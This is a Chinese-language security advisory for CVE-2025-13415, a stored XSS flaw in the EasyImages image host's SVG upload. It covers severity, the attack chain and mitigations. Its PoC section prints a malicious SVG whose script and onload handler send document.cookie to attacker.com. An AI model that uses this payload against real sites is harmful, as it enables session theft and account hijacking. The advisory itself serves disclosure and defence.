CVE-2025-13415 icret EasyImages SVG Image Handler跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-13415

漏洞类型

XSS跨站脚本攻击

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

icret EasyImages

漏洞概述

CVE-2025-13415是icret EasyImages项目中存在的存储型跨站脚本(XSS)漏洞。该漏洞存在于EasyImages图像托管系统2.8.6及之前版本中，攻击者可以通过SVG图像上传功能注入恶意脚本代码。由于系统在处理SVG文件时未对上传内容进行充分的输入验证和输出编码，恶意代码会被存储在服务器上。当其他用户访问或浏览这些被注入的SVG图像时，攻击者注入的JavaScript代码将在受害者浏览器上下文中执行，从而窃取用户会话信息、劫持用户账户或进行钓鱼攻击。这是一个需要低权限认证且需要用户交互的漏洞，但可远程利用，对系统机密性和完整性造成低程度影响。

技术细节

该漏洞位于EasyImages的/app/upload.php文件中的SVG Image Handler组件。攻击者利用文件上传功能上传精心构造的SVG文件，该文件中包含恶意的<script>标签或事件处理器(如onerror、onload等)。由于系统未对SVG内容进行严格的MIME类型检查和内容过滤，恶意代码被成功上传并存储。当受害者在Web界面中查看该SVG图像时，浏览器会解析SVG标签并执行其中的JavaScript代码。攻击者可以利用此漏洞执行以下操作：1) 通过document.cookie窃取用户会话cookie；2) 劫持用户账户进行未授权操作；3) 重定向用户到恶意网站进行钓鱼攻击；4) 在用户浏览器中执行任意JavaScript代码。由于该漏洞影响图像托管平台的所有用户，其危害范围较广。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标站点使用icret EasyImages图像托管系统，并确定其版本是否在2.8.6或更早版本

STEP 2

步骤2: 构造恶意SVG文件

攻击者创建包含恶意JavaScript代码的SVG文件，利用<script>标签或事件处理器(onerror、onload等)注入XSS payload

STEP 3

步骤3: 上传恶意文件

攻击者使用低权限账户登录系统，通过/app/upload.php接口上传构造好的恶意SVG文件

STEP 4

步骤4: 触发漏洞执行

当其他用户访问或浏览该SVG图像时，浏览器解析SVG并执行注入的JavaScript代码

STEP 5

步骤5: 数据窃取/账户劫持

恶意脚本窃取用户cookie、会话令牌或其他敏感信息，并发送到攻击者控制的服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-13415 PoC: Malicious SVG file for XSS injection -->
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <script type="text/javascript">
    // Steal user cookies/session data
    var stolen_data = document.cookie;
    // Send data to attacker-controlled server
    new Image().src = "http://attacker.com/steal?data=" + encodeURIComponent(stolen_data);
    // Alternative: using event handler
    // alert('XSS Vulnerability - CVE-2025-13415');
  </script>
  <!-- Alternative PoC using onerror event -->
  <image x="0" y="0" width="100" height="100" onerror="alert(document.cookie)" href="invalid-image"/>
  <!-- Alternative PoC using onload event -->
  <svg onload="fetch('http://attacker.com/log?cookie='+document.cookie)">
</svg>

<!-- Upload this SVG file via /app/upload.php endpoint -->
<!-- When other users view this image, the malicious script will execute -->

影响范围

icret EasyImages <= 2.8.6

防御指南

临时缓解措施

在修复补丁发布之前，可采取以下临时缓解措施：1) 临时禁用SVG文件上传功能；2) 部署严格的文件上传白名单策略，仅允许上传PNG、JPG等安全图像格式；3) 配置Web服务器对SVG文件添加Content-Type-Disposition: attachment头部，强制下载而非直接在浏览器中渲染；4) 启用严格的内容安全策略(CSP)阻止内联脚本执行；5) 对所有图像文件使用独立的域名托管，实现cookie隔离；6) 限制低权限用户的上传功能。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13415
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13415
3 Details https://www.cvedetails.com/cve/CVE-2025-13415/
4 VulDB https://vuldb.com/cve/CVE-2025-13415
5 Link https://github.com/icret/EasyImages2.0/issues/260
6 Link https://vuldb.com/?ctiid.332940
7 Link https://vuldb.com/?id.332940
8 Link https://vuldb.com/?submit.693732
9 Link https://github.com/icret/EasyImages2.0/issues/260